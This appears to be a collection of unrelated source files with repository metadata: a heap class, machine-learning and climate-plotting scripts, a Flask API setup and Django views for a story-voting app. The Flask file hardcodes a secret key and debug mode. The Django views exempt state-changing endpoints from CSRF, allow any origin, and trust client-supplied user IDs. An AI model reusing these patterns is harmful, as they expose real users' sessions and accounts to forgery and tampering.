return "YES"
def main():
t = I()
for _ in range(t):
n = I()
lst = []
for _ in range(n):
lst.append(S())
print(solve(lst))
main()
|
[
"jeemyeong@gmail.com"
] |
jeemyeong@gmail.com
|
0b6395abe2b53c4ce9df5eaab42b972dbf838e3a
|
8c67a786d726e4e02d494ba35b882bd8e88042c8
|
/heap/heap.py
|
313d96e37d43fc4ddae312437914809721a01d9e
|
[] |
no_license
|
Bloomca/algorithms
|
34143667ea902a4d2e0e81a79660cdc80c7c3c11
|
a36fc0334b02793c914959664dbc11c4e71a72a3
|
refs/heads/master
| 2021-01-19T02:49:19.510850
| 2016-07-26T19:14:56
| 2016-07-26T19:14:56
| 63,779,615
| 4
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,446
|
py
|
class Heap:
"""
Heap data structure with two operations:
Insert in O(n * log(n))
Extract-min (Extract-max) in O(n * log(n))
Both types of heaps are supported, both min and max extraction
Data is stored in array, with binary layers
"""
def __init__(self, type = 'min'):
self.data = []
self.type = type
"""
Parent index is always twice closer to the beginning of the array
"""
def get_parent(self, i):
return (i + 1) / 2 - 1
def check_heap_property(self, parent_elem, child_elem):
if self.type == 'min':
return parent_elem <= child_elem
else:
return parent_elem >= child_elem
"""
Insert strategy is that we add the child to the end of the array
And then we check whether we violated or not heap structure
Because layers are structured as binary tree, we have maximum
log(n) layers, and in the worst case we have to replace
elements log(n) times
"""
def insert(self, element):
self.data.append(element)
child_index = len(self.data) - 1
while child_index > 0:
parent_index = self.get_parent(child_index)
child_elem = self.data[child_index]
parent_elem = self.data[parent_index]
heap_property = self.check_heap_property(parent_elem, child_elem)
if heap_property == False:
self.data[parent_index] = element
self.data[child_index] = parent_elem
child_index = parent_index
else:
break
return self.data
def extract(self):
elem = self.data[0]
self.data[0] = self.data[-1]
self.data = self.data[:-1]
index = 0
min_index = 0
min_child = 0
while True:
parent_elem = self.data[index]
children_index = index * 2
child_left_index = children_index + 1
child_right_index = children_index + 2
try:
child_left = self.data[child_left_index]
except:
child_left = None
try:
child_right = self.data[child_right_index]
except:
child_right = None
if child_left is None and child_right is None:
break;
elif child_left is None:
min_child = child_right
min_index = child_right_index
elif child_right is None:
min_child = child_left
min_index = child_left_index
elif (self.type == 'min' and child_left <= child_right) or (self.type == 'max' and child_left >= child_right):
min_child = child_left
min_index = child_left_index
elif (self.type == 'min' and child_left > child_right) or (self.type == 'max' and child_left < child_right):
min_child = child_right
min_index = child_right_index
heap_property = self.check_heap_property(parent_elem, min_child)
if heap_property == False:
self.data[index] = min_child
self.data[min_index] = parent_elem
index = min_index
else:
break
return (elem, self.data)
def get_data(self):
return self.data
def get_length(self):
return len(self.data)
|
[
"seva.zaikov@gmail.com"
] |
seva.zaikov@gmail.com
|
87fc10a9db642a91f08b99c9b1c87dfbdc15c7ba
|
70c4f21aabb1bdf26789b38883cbde737250d38c
|
/digital_voting_app/web_app/migrations/0003_remove_voter_occupation.py
|
147ab5d098a749c141df1d86c62935bb714d2cdb
|
[] |
no_license
|
DigitalVotingApp-Dev/DigitalVotingApp
|
55f2853a2467582f524a761f2c48bcb24d5ee213
|
da80e167ee6697a93ee1e668b6ccfe7807148b22
|
refs/heads/master
| 2022-12-13T13:00:40.289476
| 2019-06-18T11:04:19
| 2019-06-18T11:04:19
| 161,016,237
| 1
| 1
| null | 2022-12-08T00:53:50
| 2018-12-09T07:37:58
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 332
|
py
|
# Generated by Django 2.0.13 on 2019-03-27 06:27
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('web_app', '0002_auto_20190326_1628'),
]
operations = [
migrations.RemoveField(
model_name='voter',
name='occupation',
),
]
|
[
"baljeetsingh1274@gmail.com"
] |
baljeetsingh1274@gmail.com
|
a887704eba56ea217186faef1581f771a575cae2
|
c4a32dc9fb26d72721864982b52578e2aea31db4
|
/1.PRIMERA EXPOSICIÓN/Perfil vertical eventos/CONFIRMACIÓN EVN TT.py
|
d4fbf3970dd6c725de7ddbc27eb8f6eb44bf4d1d
|
[] |
no_license
|
yordanarango/CODE_TRABAJO_GRADO
|
30eee8778bf4d61706fd5e7dc26b609ad1214fd3
|
5eb55e90b864359942e40ac8d4672c28dea1e1de
|
refs/heads/master
| 2021-04-15T12:18:33.032433
| 2018-03-22T14:19:35
| 2018-03-22T14:19:35
| 126,347,319
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,496
|
py
|
from mpl_toolkits.basemap import Basemap
import matplotlib.pyplot as plt
import matplotlib.pylab as pl
import netCDF4 as nc
import numpy as np
####################
"LECTURA DE DATOS"
####################
Archivo = nc.Dataset('/home/yordan/Escritorio/TRABAJO_DE_GRADO/DATOS_Y_CODIGOS/DATOS/PERFIL_DE_EVENTOS_DE_VIENTOS/EVENTO_TEHUANTEPEC.nc')
v_e = Archivo.variables['v'][:, :, 24:, 60:181]
u_e = Archivo.variables['u'][:, :, 24:, 60:181]
level = Archivo.variables["level"][:]
V = nc.Dataset('/home/yordan/Escritorio/TRABAJO_DE_GRADO/DATOS_Y_CODIGOS/DATOS/VIENTO V a 10 m (promedio mensual).nc')
U = nc.Dataset('/home/yordan/Escritorio/TRABAJO_DE_GRADO/DATOS_Y_CODIGOS/DATOS/VIENTO U a 10 m (promedio mensual).nc')
v = V.variables["v10"][:, 24:, 60:181]
u = U.variables["u10"][:, 24:, 60:181]
Lat = V.variables["latitude"][24:] # Se recorta de una vez el arreglo de latitudes de 0 a 24 N
Lon = V.variables["longitude"][60:181] # Se recorta de una vez el arreglo de longitudes de 255 E a 285 E
#######################################
"ORGANIZACION DE LAS VARIABLES\
YA QUE VAN DEBEN IR EN CORDENADAS ESTE"
#######################################
Lon = Lon-360
########################
"CICLO ANUAL DE VIENTOS"
########################
cic_an_u = np.zeros((12,97,121))
cic_an_v = np.zeros((12,97,121))
for i in range(12):
for j in range(97):
for k in range(121):
cic_an_u[i,j,k] = np.mean(u[i::12,j,k])
cic_an_v[i,j,k] = np.mean(v[i::12,j,k])
############################
"MEDIA NOV Y DIC DE VIENTOS"
############################
med_ND_u = np.zeros((97, 121))
med_ND_v = np.zeros((97, 121))
for j in range(97):
for k in range(121):
med_ND_u[j,k] = np.mean(cic_an_u[10:12,j,k])
med_ND_v[j,k] = np.mean(cic_an_v[10:12,j,k])
################################################
"ANOMALÍA DE VIENTOS DEL EVENTO A NIVEL DEL MAR"
################################################
an_u_evn = np.zeros((6,97,121))
an_v_evn = np.zeros((6,97,121))
for i in range(6):
for j in range(97):
for k in range(121):
an_u_evn[i,j,k] = u_e[i,36,j,k]-med_ND_u[j,k]
an_v_evn[i,j,k] = v_e[i,36,j,k]-med_ND_v[j,k]
##########################################
"MEDIA DE ANOMALÍAS DE VIENTOS DEL EVENTO"
##########################################
med_an_u_evn = np.zeros((97,121))
med_an_v_evn = np.zeros((97,121))
for i in range(97):
for j in range(121):
med_an_u_evn[i,j] = np.mean(an_u_evn[:,i,j])
med_an_v_evn[i,j] = np.mean(an_v_evn[:,i,j])
################################
"VELOCIDAD DE VIENTOS 1979-2016"
################################
spd = np.sqrt(u*u+v*v)
#####################################
"CICLO ANUAL DE VELOCIDAD DE VIENTOS"
#####################################
cic_an_spd = np.zeros(((12, 97, 121)))
for i in range(12):
for j in range(97):
for k in range(121):
cic_an_spd[i,j,k] = np.mean(spd[i::12,j,k])
#########################################
"MEDIA NOV Y DIC DE VELOCIDAD DE VIENTOS"
#########################################
med_ND_spd = np.zeros((97, 121))
for j in range(97):
for k in range(121):
med_ND_spd[j,k] = np.mean(cic_an_spd[10:12,j,k])
#############################################################
"ANOMALÍA DE VELOCIDAD DE VIENTOS DEL EVENTO A NIVEL DEL MAR"
#############################################################
spd_evn = np.sqrt(u_e[:6,36,:,:]*u_e[:6,36,:,:]+v_e[:6,36,:,:]*v_e[:6,36,:,:]) #Velocidad del evento a nivel del mar
an_spd_evn = np.zeros((6,97,121))
for i in range(6):
for j in range(97):
for k in range(121):
an_spd_evn[i,j,k] = spd_evn[i,j,k]-med_ND_spd[j,k]
##########################################################
"PROMEDIO DE ANOMALÍAS DE VELOCIDAD DE VIENTOS DEL EVENTO"
##########################################################
me_an_spd_evn = np.zeros((97,121))
for i in range(97):
for j in range(121):
me_an_spd_evn[i,j] = np.mean(an_spd_evn[:,i,j])
###################
"MAPA DE ANOMALÍAS"
###################
box_TT_lon = [-97, -97, -93.3, -93.3, -97]
box_TT_lat = [15.9, 11.7, 11.7, 15.9, 15.9]
lons,lats = np.meshgrid(Lon,Lat)
fig = plt.figure(figsize=(8,8), edgecolor='W',facecolor='W')
ax = fig.add_axes([0.1,0.1,0.8,0.8])
map = Basemap(projection='merc', llcrnrlat=0, urcrnrlat=24, llcrnrlon=-105, urcrnrlon=-75, resolution='i')
map.drawcoastlines(linewidth = 0.8)
map.drawcountries(linewidth = 0.8)
map.drawparallels(np.arange(0, 30, 8),labels=[1,0,0,1])
map.drawmeridians(np.arange(-120,-60,15),labels=[1,0,0,1])
x, y = map(lons,lats)
x1, y1 = map(-94.5, 19.25)
x2, y2 = map(-94.75, 17.25)
x3, y3 = map(-94.75, 15)
TT_lon,TT_lat = map(box_TT_lon, box_TT_lat)
CF = map.contourf(x,y, me_an_spd_evn[:,:], np.linspace(0, 14, 20), extend='both', cmap=plt.cm.RdYlBu_r )#plt.cm.rainbow, plt.cm.RdYlBu_r
cb = map.colorbar(CF, size="5%", pad="2%", extendrect = 'True', drawedges = 'True', format='%.1f')
cb.set_label('m/s')
Q = map.quiver(x[::2,::2], y[::2,::2], med_an_u_evn[::2,::2], med_an_v_evn[::2,::2], scale=300)
plt.quiverkey(Q, 0.95, 0.05, 10, '10 m/s' )
ax.set_title('$Anomalia$ $media$ $del$ $evento-Tehuantepec-(Nov/2002)$', size='15')
map.plot(TT_lon, TT_lat, marker=None, color='k')
map.plot(x1, y1, marker='D', color='m')
map.plot(x2, y2, marker='D', color='m')
map.plot(x3, y3, marker='D', color='m')
map.fillcontinents(color='white')
plt.show()
|
[
"yuarangoj@unal.edu.co"
] |
yuarangoj@unal.edu.co
|
b5772ab6d016c1eada09bc35eb878b6ac386dbe6
|
da91b375b9450be733370ca715e704f912e4efd0
|
/flaskapp/__init__.py
|
49df7b0183f418a855dc1d364e166e3942e2626e
|
[] |
no_license
|
Ge-eez/IProject-Backend
|
b64a51ce83ed536f9a53314b6fada2e8ed9dcee9
|
cafbac7161fab564ba90707760b485b07498a1d5
|
refs/heads/master
| 2023-05-22T16:17:00.562210
| 2021-06-17T04:46:27
| 2021-06-17T04:46:27
| 369,288,841
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,487
|
py
|
import os
from flask import Flask
from flask_cors import CORS
from flask_session import Session
from flask_sqlalchemy import SQLAlchemy
from flask_bcrypt import Bcrypt
from flask_login import LoginManager
from flask_restful import Api
from flask_migrate import Migrate
from flask_rest_paginate import Pagination
from safrs import SAFRSBase, SAFRSAPI
app = Flask(__name__)
app.config["SESSION_PERMANENT"] = True
app.config["SESSION_TYPE"] = "filesystem"
app.config['SECRET_KEY'] = 'f604efb78b05fc462348c8f5f4cf82c7'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True
app.config['SESSION_COOKIE_SAMESITE'] = 'Lax'
app.config["DEBUG"] = True
db = SQLAlchemy()
dbUrl = os.getenv("DATABASE_URL")
if(dbUrl[8] == ":"):
dbUrl = dbUrl[0:8] + "ql" + dbUrl[8:len(dbUrl)]
app.config['SQLALCHEMY_DATABASE_URI'] = dbUrl
db.init_app(app)
CORS(app, support_credentials=True)
bcrypt = Bcrypt(app)
Session(app)
login_manager = LoginManager(app)
api = Api(app)
migrate = Migrate(app, db)
pagination = Pagination(app, db)
app.app_context().push()
from flaskapp.models import *
def create_api(app, HOST="localhost", PORT=5000, API_PREFIX=""):
api = SAFRSAPI(app, host=HOST, port=PORT, prefix=API_PREFIX)
api.expose_object(Account)
api.expose_object(Admin)
api.expose_object(Institution)
api.expose_object(Company)
api.expose_object(Student)
api.expose_object(Teacher)
api.expose_object(Project)
api.expose_object(Work)
api.expose_object(Rating)
api.expose_object(Payment)
print("Created API: http://{}:{}/{}".format(HOST, PORT, API_PREFIX))
from flaskapp import routes, auth, project, user, institution, work, rating, payment
app.register_blueprint(auth.bp)
api.add_resource(institution.InstitutionAPI, '/institutions/', '/institutions/<int:id>')
api.add_resource(project.ProjectAPI, '/projects/', '/projects/<int:id>')
api.add_resource(user.UserAPI, '/users/', '/users/<int:id>')
api.add_resource(user.UserVerificationAPI, '/users/verify/<int:id>')
api.add_resource(user.StudentAPI, '/students/', '/students/<int:id>')
api.add_resource(user.TeacherAPI, '/teachers/', '/teachers/<int:id>')
api.add_resource(user.CompanyAPI, '/companies/', '/companies/<int:id>')
api.add_resource(work.WorkAPI, '/works/', '/works/<int:id>')
api.add_resource(work.FinishWorkAPI, '/work/end/<int:id>')
api.add_resource(rating.RateAPI, '/rates/', '/rates/<int:id>')
api.add_resource(payment.PaymentAPI, '/payments/', '/payments/<int:id>')
# create_api(app)
|
[
"elshadaikassutegegn@gmail.com"
] |
elshadaikassutegegn@gmail.com
|
097dfea7934d6c0ecbe261df559a5c5f50018e6f
|
6daabad92d7071879fd8822963f2c709dba3c450
|
/hw2-2.py
|
30efcc4a0f884c75c395622f783d94c37abdbbd4
|
[] |
no_license
|
y1k333/ML-ng
|
ac03601b62493902ae959e2f65dc0d17bf65c01d
|
2b99ece503f580926886f6e1a82c22a49f0706ad
|
refs/heads/master
| 2021-05-09T09:50:26.517315
| 2018-09-28T20:04:25
| 2018-09-28T20:04:25
| 119,460,429
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,387
|
py
|
# Logistic Regression with regularization
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
# visualize data
datafile = 'data/ex2data2.txt'
cols = np.loadtxt(datafile,delimiter=',',usecols=(0,1,2),unpack=True) # Read in comma separated data
# Form the usual "X" matrix and "y" vector
X = np.transpose(np.array(cols[:-1]))
y = np.transpose(np.array(cols[-1:]))
m = y.size # number of training examples
# Insert the usual column of 1's into the "X" matrix
X = np.insert(X,0,1,axis=1)
# Divide the sample into two: ones with positive classification, one with null classification
pos = np.array([X[i] for i in xrange(X.shape[0]) if y[i] == 1])
neg = np.array([X[i] for i in xrange(X.shape[0]) if y[i] == 0])
# Check to make sure I included all entries
# print "Included everything? ",(len(pos)+len(neg) == X.shape[0])
def plot_data():
plt.plot(pos[:,1],pos[:,2],'k+',label='y=1')
plt.plot(neg[:,1],neg[:,2],'yo',label='y=0')
plt.xlabel('Microchip Test 1')
plt.ylabel('Microchip Test 2')
plt.legend()
plt.grid(True)
# Draw it square to emphasize circular features
plt.figure(figsize=(6,6))
plot_data()
# feature mapping
def mapFeature(x1col, x2col):
"""
Function that takes in a column of n- x1's, a column of n- x2s, and builds
a n- x 28-dim matrix of features as described in the homework assignment
"""
degrees = 6
out = np.ones((x1col.shape[0], 1))
for i in range(1, degrees+1):
for j in range(0, i+1):
term1 = x1col ** (i-j)
term2 = x2col ** (j)
term = (term1 * term2).reshape( term1.shape[0], 1 )
out = np.hstack(( out, term ))
return out
# Create feature-mapped X matrix
mappedX = mapFeature(X[:,1],X[:,2])
from scipy.special import expit #Vectorized sigmoid function
# Hypothesis function and cost function for logistic regression
def h(mytheta, myX): # Logistic hypothesis function
return expit(np.dot(myX,mytheta))
# cost funtion, default lambda (regularization) 0
def compute_cost(mytheta, myX, myy, mylambda = 0.):
"""
mytheta is an n- dimensional vector of initial theta guess
X is matrix with m- rows and n- columns
y is a matrix with m- rows and 1 column
Note this includes regularization, if you set mylambda to nonzero
For the first part of the homework, the default 0. is used for mylambda
"""
term1 = np.dot(np.array(myy).T, np.log(h(mytheta, myX)))
term2 = np.dot((1 - np.array(myy)).T, np.log(1 - h(mytheta, myX)))
regterm = (mylambda / 2) * np.sum(np.dot(mytheta[1:].T, mytheta[1:])) # Skip theta0
return float(-(1./m) * (term1 + term2 + regterm))
# cost function and gradient
# Cost function is the same as the one implemented above, as I included the regularization
# toggled off for default function call (lambda = 0)
# I do not need separate implementation of the derivative term of the cost function
# Because the scipy optimization function I'm using only needs the cost function itself
# Let's check that the cost function returns a cost of 0.693 with zeros for initial theta,
# and regularized x values
initial_theta = np.zeros((mappedX.shape[1],1))
compute_cost(initial_theta,mappedX,y)
# Learning parameters using fminunc
# I noticed that fmin wasn't converging (passing max # of iterations)
# so let's use minimize instead
from scipy import optimize
def optimizeRegularizedTheta(mytheta, myX, myy, mylambda=0.):
result = optimize.minimize(compute_cost, mytheta, args=(myX, myy, mylambda), method='BFGS',
options={"maxiter": 500, "disp": False})
return np.array([result.x]), result.fun
theta, mincost = optimizeRegularizedTheta(initial_theta, mappedX, y)
def plotBoundary(mytheta, myX, myy, mylambda=0.):
"""
Function to plot the decision boundary for arbitrary theta, X, y, lambda value
Inside of this function is feature mapping, and the minimization routine.
It works by making a grid of x1 ("xvals") and x2 ("yvals") points,
And for each, computing whether the hypothesis classifies that point as
True or False. Then, a contour is drawn with a built-in pyplot function.
"""
theta, mincost = optimizeRegularizedTheta(mytheta,myX,myy,mylambda)
xvals = np.linspace(-1,1.5,50)
yvals = np.linspace(-1,1.5,50)
zvals = np.zeros((len(xvals),len(yvals)))
for i in xrange(len(xvals)):
for j in xrange(len(yvals)):
myfeaturesij = mapFeature(np.array([xvals[i]]),np.array([yvals[j]]))
zvals[i][j] = np.dot(theta,myfeaturesij.T)
zvals = zvals.transpose()
u, v = np.meshgrid( xvals, yvals )
mycontour = plt.contour( xvals, yvals, zvals, [0])
#Kind of a hacky way to display a text on top of the decision boundary
myfmt = { 0:'Lambda = %d'%mylambda}
plt.clabel(mycontour, inline=1, fontsize=15, fmt=myfmt)
plt.title("Decision Boundary")
# Build a figure showing contours for various values of regularization parameter, lambda
# It shows for lambda=0 we are overfitting, and for lambda=100 we are underfitting
plt.figure(figsize=(12, 10))
plt.subplot(221)
plot_data()
plotBoundary(theta, mappedX, y, 0.)
plt.subplot(222)
plot_data()
plotBoundary(theta, mappedX, y, 1.)
plt.subplot(223)
plot_data()
plotBoundary(theta, mappedX, y, 10.)
plt.subplot(224)
plot_data()
plotBoundary(theta, mappedX, y, 100.)
plt.show()
|
[
"kaiyang@usc.edu"
] |
kaiyang@usc.edu
|
2f145ed3885c6a99d1b0264ddffbc2837b3817a4
|
f49d35798bdc789767f93913439ae71e5e76de0d
|
/final/post/views.py
|
5754f642fafdc3d911d1e3c7a3128841438cdeb1
|
[] |
no_license
|
RealWei/Social-Computing-Application-Design
|
49aafd37e6917e0606efefa1c1c68d52c6cba51c
|
68674ea18af69e94ed920d422b7ad73fdbe2eac0
|
refs/heads/master
| 2016-09-13T20:45:18.913838
| 2016-05-25T02:21:23
| 2016-05-25T02:21:23
| 59,623,894
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,081
|
py
|
# -*- coding: utf-8 -*-
import json
from random import sample
from django.shortcuts import render
from django import forms
from django.core import serializers
from django.http import HttpResponse
from django.http import HttpResponseRedirect
from django.http import JsonResponse
from django.views.decorators.csrf import csrf_exempt
from post.models import Story, StoryForm, Vote
from post.recommendations import ProductRecommendationProvider
from register.models import User
recommender = ProductRecommendationProvider()
@csrf_exempt
def create(request):
# return HttpResponseRedirect('http://www.facebook.com')
if request.method == 'POST':
form = StoryForm(request.POST, request.FILES)
if form.is_valid():
userID = form.cleaned_data['userID']
user = User.objects.get(id=userID)
user.coins += 5
user.save()
new_story = form.save()
story = Story.objects.get(pk = new_story.pk)
story.userName = user.name
story.save()
response_data = serializers.serialize('json', [story,])
return HttpResponse(response_data, content_type='application/json')
else:
print(form.errors)
form = StoryForm()
return render(request, 'temp.html', {'form': form})
def getStory(request):
friends = request.GET.getlist('friends[]')
stories = Story.objects.filter(userID__in = friends).order_by('id').reverse()
response_data = serializers.serialize('json', stories)
struct = json.loads(response_data)
response_data = json.dumps(struct, ensure_ascii=False)
response = HttpResponse(response_data, content_type='application/json')
response['Access-Control-Allow-Origin'] = '*'
response['Access-Control-Allow-Methods'] = 'POST, GET'
response['Access-Control-Max-Age'] = '1000'
response['Access-Control-Allow-Headers'] = '*'
response['charset'] = 'utf-8'
return response
@csrf_exempt
def vote(request):
if request.method == 'POST':
storyID = request.POST.get('storyID', '2')
userFBID = request.POST.get('userFBID', '1')
score = float(request.POST.get('score', '1'))
vote = Vote.objects.filter(story_id = storyID, user_id = userFBID)
story = Story.objects.get(pk = storyID)
if vote.exists():
vote = vote[0]
if vote.score > 0:
story.likes += 1
story.dislikes -= 1
else:
story.likes -= 1
story.dislikes += 1
vote.score = score
vote.save()
else:
if score > 0:
story.likes += 1
else:
story.dislikes += 1
vote = Vote.objects.create(story_id = storyID, user_id = userFBID, score = score)
story.save()
return HttpResponse(status = 201)
response = HttpResponse(rstatus = 200)
response['Access-Control-Allow-Origin'] = '*'
response['Access-Control-Allow-Methods'] = 'POST, GET, DELETE'
response['Access-Control-Max-Age'] = '1000'
response['Access-Control-Allow-Headers'] = '*'
return response
@csrf_exempt
def deleteVote(request):
storyID = request.POST['storyID']
userFBID = request.POST['userFBID']
score = float(request.POST['score'])
Vote.objects.filter(story_id = storyID, user_id = userFBID).delete()
story = Story.objects.get(pk = storyID)
if score > 0:
story.likes -= 1
else:
story.dislikes -= 1
story.save()
return HttpResponse(status = 202)
def getVotes(request):
storyID = request.GET['storyID']
userFBID = request.GET['userFBID']
response_data = serializers.serialize('json', Vote.objects.filter(story_id = storyID, user_id = userFBID))
struct = json.loads(response_data)
response_data = json.dumps(struct, ensure_ascii = False)
response = HttpResponse(response_data, content_type='application/json')
response['Access-Control-Allow-Origin'] = '*'
response['Access-Control-Allow-Methods'] = 'POST, GET'
response['Access-Control-Max-Age'] = '1000'
response['Access-Control-Allow-Headers'] = '*'
response['charset'] = 'utf-8'
return response
def getUser(request):
userID = request.GET['userFBID']
response_data = serializers.serialize('json', [User.objects.get(id = userID),])
struct = json.loads(response_data)
response_data = json.dumps(struct, ensure_ascii = False)
response = HttpResponse(response_data, content_type='application/json')
response['Access-Control-Allow-Origin'] = '*'
response['Access-Control-Allow-Methods'] = 'POST, GET'
response['Access-Control-Max-Age'] = '1000'
response['Access-Control-Allow-Headers'] = '*'
response['charset'] = 'utf-8'
return response
def recommend(request):
userID = request.GET.get('userFBID', '0')
user = User.objects.get(id = userID)
if(user.coins <= 0):
return HttpResponse(status = 204)
user.coins -= 1
user.save()
# recommender.precompute()
recommendations = []
query = list(recommender.storage.get_recommendations_for_user(user = User.objects.get(id = userID)))
for recommendation in query:
recommendations.append(recommendation.object)
if(len(recommendations) < 5):
count = Story.objects.all().count()
rand_ids = sample(range(1, count), 5 - len(recommendations))
stories = list(Story.objects.filter(id__in=rand_ids))
for story in stories:
recommendations.append(story)
serialized_string = serializers.serialize('json', recommendations)
json_string = json.loads(serialized_string)
response_data = json.dumps(json_string, ensure_ascii=False)
response = HttpResponse(response_data, content_type='application/json')
response['Access-Control-Allow-Origin'] = '*'
response['Access-Control-Allow-Methods'] = 'POST, GET'
response['Access-Control-Max-Age'] = '1000'
response['Access-Control-Allow-Headers'] = '*'
response['charset'] = 'utf-8'
return response
|
[
"tsengchengwei@gmail.com"
] |
tsengchengwei@gmail.com
|
79d55234b6cc4dd1255378d64c29ca50ce4f32b4
|
2af943fbfff74744b29e4a899a6e62e19dc63256
|
/4DModules/FourDAnalysis/Python/CurveFittingGammaVariate.py
|
145cbfbd7f2281c8b7ae3578411964ded0cf0d56
|
[] |
no_license
|
lheckemann/namic-sandbox
|
c308ec3ebb80021020f98cf06ee4c3e62f125ad9
|
0c7307061f58c9d915ae678b7a453876466d8bf8
|
refs/heads/master
| 2021-08-24T12:40:01.331229
| 2014-02-07T21:59:29
| 2014-02-07T21:59:29
| 113,701,721
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,093
|
py
|
# ----------------------------------------------------------------------
#
# Python Package for Curve Fitting in 3D Slicer 4D Analysis Module
#
# Portions (c) Copyright 2009 Brigham and Women's Hospital (BWH)
# All Rights Reserved.
#
# See Doc/copyright/copyright.txt
# or http://www.slicer.org/copyright/copyright.txt for details.
#
# Author: Junichi Tokuda (tokuda@bwh.harvard.edu)
#
# For more detail, please refer:
# http://wiki.na-mic.org/Wiki/index.php/Slicer3:FourDAnalysis
# ----------------------------------------------------------------------
# ----------------------------------------------------------------------
# NOTE:
# This python script requires SciPy package, which doesn't come with
# Slicer3 package in default. Build 3D Slicer with USE_SCIPY option
# (can be configured in slicer_variables.tcl) before run this script
# from 3D Slicer.
# ----------------------------------------------------------------------
from FourDAnalysis import CurveAnalysisBase
import scipy, numpy
from scipy.integrate import quad
import sys
# ----------------------------------------------------------------------
# Gamma Variate Function fitting class
# ----------------------------------------------------------------------
class CurveFittingGammaVariate(CurveAnalysisBase):
# ------------------------------
# Constructor -- Set initial parameters
def __init__(self):
self.ParameterNameList = ['Sp', 'alpha', 'beta', 'Ta', 'S0']
self.InitialParameter = [200.0, 3.0, 1.0, 0.0, 20.0]
self.MethodName = 'Gamma Variate Function fitting'
self.MethodDescription = '...'
# ------------------------------
# Convert signal intensity curve to concentration curve
# Assuming parmagnetic contrast media (e.g. Gd-DTPA)
def SignalToConcent(self, signal):
cont = signal / signal[0] - 1.0
return cont
# ------------------------------
# Convert concentration curve to signal intensity curve
def ConcentToSignal(self, concent):
signal = (concent + 1.0) * self.TargetCurve[0, 1]
return signal
# ------------------------------
# Definition of the function
def Function(self, x, param):
Sp, alpha, beta, Ta, S0 = param
y = Sp * numpy.abs(scipy.power((scipy.e / (alpha*beta)), alpha)) * numpy.abs(scipy.power((x-Ta), alpha)) * scipy.exp(-(x-Ta)/beta) + S0
return y
# ------------------------------
# Calculate the output parameters (called by GetOutputParam())
def CalcOutputParam(self, param):
Sp, alpha, beta, Ta, S0 = param
sts = quad(lambda x: x*(self.Function(x, param) - S0), 0.0, 100.0)
ss = quad(lambda x: self.Function(x, param) - S0, 0.0, 100.0)
if ss <> 0.0:
MTT = sts[0] / ss[0]
else:
MTT = 0.0
dict = {}
dict['MTT'] = MTT
dict['Sp'] = Sp
#dict['alpha'] = alpha
#dict['beta'] = beta
#dict['Ta'] = Ta
#dict['S0'] = S0
return dict
|
[
"tokuda@5e132c66-7cf4-0310-b4ca-cd4a7079c2d8"
] |
tokuda@5e132c66-7cf4-0310-b4ca-cd4a7079c2d8
|
4dc527e0d25970a1dd5729429b4c49f2b26b84a8
|
b144cb0c9e497136c99e608c1cf3cf0b2e0e3c2d
|
/D3Q/src/deep_dialog/controller/discriminator.py
|
c41b0977a9d25d99e2f92a3f40d2c69110e8124f
|
[] |
no_license
|
loremdai/A2C_PPO
|
924182d780836a4774bc304c0bb460a1ef22c143
|
f8135e4f9e3109a8861166b05f2090a1389188a9
|
refs/heads/master
| 2023-06-02T10:52:34.839587
| 2021-06-30T09:56:54
| 2021-06-30T09:56:54
| 381,645,317
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 16,653
|
py
|
'''
created on Mar 13, 2018
@author: Shang-Yu Su (t-shsu)
'''
import torch
import torch.nn as nn
from torch.autograd import Variable
from torch.nn.utils import clip_grad_norm_
import torch.optim as optim
import numpy as np
import random
from deep_dialog import dialog_config
use_cuda = torch.cuda.is_available()
class Discriminator(nn.Module):
def __init__(self, input_size=100, hidden_size=128, output_size=1, nn_type="MLP", movie_dict=None, act_set=None, slot_set=None, start_set=None, params=None):
super(Discriminator, self).__init__()
#############################
# misc setting #
#############################
self.movie_dict = movie_dict
self.act_set = act_set
self.slot_set = slot_set
self.start_set = start_set
self.act_cardinality = len(act_set.keys())
self.slot_cardinality = len(slot_set.keys())
self.feasible_actions = dialog_config.feasible_actions # for agent
self.feasible_actions_users = dialog_config.feasible_actions_users # for user
self.num_actions = len(self.feasible_actions)
self.num_actions_user = len(self.feasible_actions_users)
self.max_turn = params['max_turn'] + 5
self.state_dimension = 213
self.hidden_size = hidden_size
self.cell_state_dimension = 213
self.nn_type = nn_type
self.threshold_upperbound = 0.55
self.threshold_lowerbound = 0.45
#############################
# model setting #
#############################
# (1) MLP discriminator (2) RNN discriminator
# (3) RNN encoder -> MLP discriminator
if nn_type == "MLP":
self.model = nn.Sequential(nn.Linear(self.state_dimension, hidden_size), nn.ELU(), nn.Linear(hidden_size, output_size), nn.Sigmoid())
elif nn_type == "RNN":
self.transform_layer = nn.Linear(self.cell_state_dimension, hidden_size)
self.model = nn.LSTM(126, hidden_size, 1, dropout=0.00, bidirectional=False)
self.output_layer = nn.Sequential(nn.Linear(hidden_size, output_size), nn.Sigmoid())
self.user_model_experience_pool = list()
self.user_experience_pool = list()
# hyperparameters
self.max_norm = 1
lr = 0.001
# optimizer & loss functions
self.BCELoss = nn.BCELoss()
if nn_type == "MLP":
self.optimizer = optim.RMSprop(self.model.parameters(), lr=lr)
elif nn_type == "RNN":
params = []
params.extend(list(self.transform_layer.parameters()))
params.extend(list(self.model.parameters()))
params.extend(list(self.output_layer.parameters()))
self.optimizer = optim.RMSprop(params, lr=lr) # 对3层layer的参数进行优化。
if use_cuda:
self.cuda()
# 存储来自世界模型的模拟经验
def store_user_model_experience(self, experience):
self.user_model_experience_pool.append(experience)
if len(self.user_model_experience_pool) > 10000: # 当经验池满时,保留最新经验
self.user_model_experience_pool = self.user_model_experience_pool[-9000:]
def store_user_experience(self, experience):
self.user_experience_pool.append(experience)
if len(self.user_experience_pool) > 10000:
self.user_experience_pool = self.user_experience_pool[-9000:]
def Variable(self, x):
return Variable(x, requires_grad=False).cuda() if use_cuda else Variable(x, requires_grad=False)
# discriminate a batch
def forward(self, experience=[]):
if self.nn_type == "MLP":
# define the policy here
